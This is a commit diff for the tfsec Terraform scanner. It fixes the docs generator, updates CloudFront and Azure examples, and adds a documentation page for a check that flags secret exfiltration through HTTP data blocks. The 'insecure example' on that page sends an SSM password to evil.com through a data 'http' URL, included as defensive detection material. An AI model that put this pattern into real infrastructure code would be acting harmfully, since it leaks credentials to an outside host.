docs: fix the generator for the documentaion

cmd/tfsec-docs/main.go

@@ -6,6 +6,7 @@ import (
 	"sort"
 	"strings"
 
+	_ "github.com/aquasecurity/defsec/loader"
 	"github.com/aquasecurity/defsec/rules"
 
 	"github.com/spf13/cobra"
@@ -53,6 +54,9 @@ func getSortedFileContents() []*FileContent {
 	checkMap := make(map[string][]templateObject)
 
 	for _, r := range rules.GetRegistered() {
+		if r.Rule().Terraform == nil {
+			continue
+		}
 		provider := string(r.Rule().Provider)
 		checkMap[provider] = append(checkMap[provider], templateObject{
 			ID:          r.Rule().LongID(),

docs/checks/aws/cloudfront/use-secure-tls-policy/index.md

@@ -9,6 +9,10 @@ title: CloudFront distribution uses outdated SSL/TLS protocols.
 ### Explanation
 
 You should not use outdated/insecure TLS versions for encryption. You should be using TLS v1.2+.
+
+Note: that setting *minimum_protocol_version = "TLSv1.2_2021"* is only possible when *cloudfront_default_certificate* is false (eg. you are not using the cloudfront.net domain name). 
+If *cloudfront_default_certificate* is true then the Cloudfront API will only allow setting *minimum_protocol_version = "TLSv1"*, and setting it to any other value will result in a perpetual diff in your *terraform plan*'s. 
+The only option when using the cloudfront.net domain name is to ignore this rule.
 
 ### Possible Impact
 Outdated SSL policies increase exposure to known vulnerabilities
@@ -24,7 +28,7 @@ The following example will fail the aws-cloudfront-use-secure-tls-policy check.
 
  resource "aws_cloudfront_distribution" "bad_example" {
    viewer_certificate {
-     cloudfront_default_certificate = true
+     cloudfront_default_certificate = aws_acm_certificate.example.arn
      minimum_protocol_version = "TLSv1.0"
    }
  }
@@ -40,7 +44,7 @@ The following example will pass the aws-cloudfront-use-secure-tls-policy check.
 
  resource "aws_cloudfront_distribution" "good_example" {
    viewer_certificate {
-     cloudfront_default_certificate = true
+     cloudfront_default_certificate = aws_acm_certificate.example.arn
      minimum_protocol_version = "TLSv1.2_2021"
    }
  }

docs/checks/aws/ssm/avoid-leaks-via-http/index.md

@@ -0,0 +1,61 @@
+---
+title: Secrets should not be exfiltrated using Terraform HTTP data blocks
+---
+
+# Secrets should not be exfiltrated using Terraform HTTP data blocks
+
+### Default Severity: <span class="severity critical">critical</span>
+
+### Explanation
+
+The data.http block can be used to send secret data outside of the organisation.
+
+### Possible Impact
+Secrets could be exposed outside of the organisation.
+
+### Suggested Resolution
+Remove this potential exfiltration HTTP request.
+
+
+### Insecure Example
+
+The following example will fail the aws-ssm-avoid-leaks-via-http check.
+```terraform
+
+resource "aws_ssm_parameter" "db_password" {
+  name = "db_password"
+  type = "SecureString"
+  value = var.db_password
+}
+
+data "http" "not_exfiltrating_data_honest" {
+  url = "https://evil.com/?p=${aws_ssm_parameter.db_password.value}"
+}
+
+```
+
+
+
+### Secure Example
+
+The following example will pass the aws-ssm-avoid-leaks-via-http check.
+```terraform
+
+resource "aws_ssm_parameter" "db_password" {
+  name = "db_password"
+  type = "SecureString"
+  value = var.db_password
+}
+
+
+```
+
+
+
+### Links
+
+
+- [https://sprocketfox.io/xssfox/2022/02/09/terraformsupply/](https://sprocketfox.io/xssfox/2022/02/09/terraformsupply/){:target="_blank" rel="nofollow noreferrer noopener"}
+
+
+

docs/checks/aws/ssm/index.md

@@ -7,6 +7,8 @@ title: ssm
 ## Checks
 
 
+- [avoid-leaks-via-http](avoid-leaks-via-http) Secrets should not be exfiltrated using Terraform HTTP data blocks
+
 - [secret-use-customer-key](secret-use-customer-key) Secrets Manager should use customer managed keys
 
 

docs/checks/azure/container/use-rbac-permissions/index.md

@@ -23,9 +23,13 @@ The following example will fail the azure-container-use-rbac-permissions check.
 ```terraform
 
  resource "azurerm_kubernetes_cluster" "bad_example" {
+	// azurerm < 2.99.0
  	role_based_access_control {
  		enabled = false
  	}
+
+	// azurerm >= 2.99.0
+	role_based_access_control_enabled = false
  }
 
 ```
@@ -38,9 +42,13 @@ The following example will pass the azure-container-use-rbac-permissions check.
 ```terraform
 
  resource "azurerm_kubernetes_cluster" "good_example" {
- 	role_based_access_control {
+	// azurerm < 2.99.0
+	role_based_access_control {
  		enabled = true
  	}
+
+	// azurerm >= 2.99.0
+ 	role_based_access_control_enabled = true
  }
 
 ```

go.sum

@@ -193,8 +193,6 @@ github.com/apparentlymart/go-textseg v1.0.0 h1:rRmlIsPEEhUTIKQb7T++Nz/A5Q6C9IuX2
 github.com/apparentlymart/go-textseg v1.0.0/go.mod h1:z96Txxhf3xSFMPmb5X/1W05FF/Nj9VFpLOpjS5yuumk=
 github.com/apparentlymart/go-textseg/v13 v13.0.0 h1:Y+KvPE1NYz0xl601PVImeQfFyEy6iT90AvPUL1NNfNw=
 github.com/apparentlymart/go-textseg/v13 v13.0.0/go.mod h1:ZK2fH7c4NqDTLtiYLvIkEghdlcqw7yxLeM89kiTRPUo=
-github.com/aquasecurity/defsec v0.25.0 h1:wfAHQSikqwAQ+y5XF0SuFHMditwytCL8VJKmOcjlxEA=
-github.com/aquasecurity/defsec v0.25.0/go.mod h1:9GDiP7iCebisShDQeEIB4E8cSJ7a7Q+anViDljTETYY=
 github.com/aquasecurity/defsec v0.26.0 h1:BTkVmbxjIEBlVyA6kbdQ4bzETC0VESlLVcSqVjF3wrM=
 github.com/aquasecurity/defsec v0.26.0/go.mod h1:9GDiP7iCebisShDQeEIB4E8cSJ7a7Q+anViDljTETYY=
 github.com/armon/circbuf v0.0.0-20150827004946-bbbad097214e/go.mod h1:3U/XgcO3hCbHZ8TKRvWD2dDTCfh9M9ya+I9JpbB7O8o=

mkdocs.yml

@@ -38,7 +38,7 @@ nav:
     - GitHub Action: guides/github-actions/github-action.md
     - PR Commenter: guides/github-actions/pr-commenter.md
   - Rego:
-      - Writing Custom Rego Policies: guides/rego/rego.md
+    - Writing Custom Rego Policies: guides/rego/rego.md
 - Checks:
   - aws:
     - api-gateway:
@@ -175,6 +175,7 @@ nav:
       - enable-queue-encryption: checks/aws/sqs/enable-queue-encryption/index.md
       - no-wildcards-in-policy-documents: checks/aws/sqs/no-wildcards-in-policy-documents/index.md
     - ssm:
+      - avoid-leaks-via-http: checks/aws/ssm/avoid-leaks-via-http/index.md
       - secret-use-customer-key: checks/aws/ssm/secret-use-customer-key/index.md
     - vpc:
       - add-description-to-security-group: checks/aws/vpc/add-description-to-security-group/index.md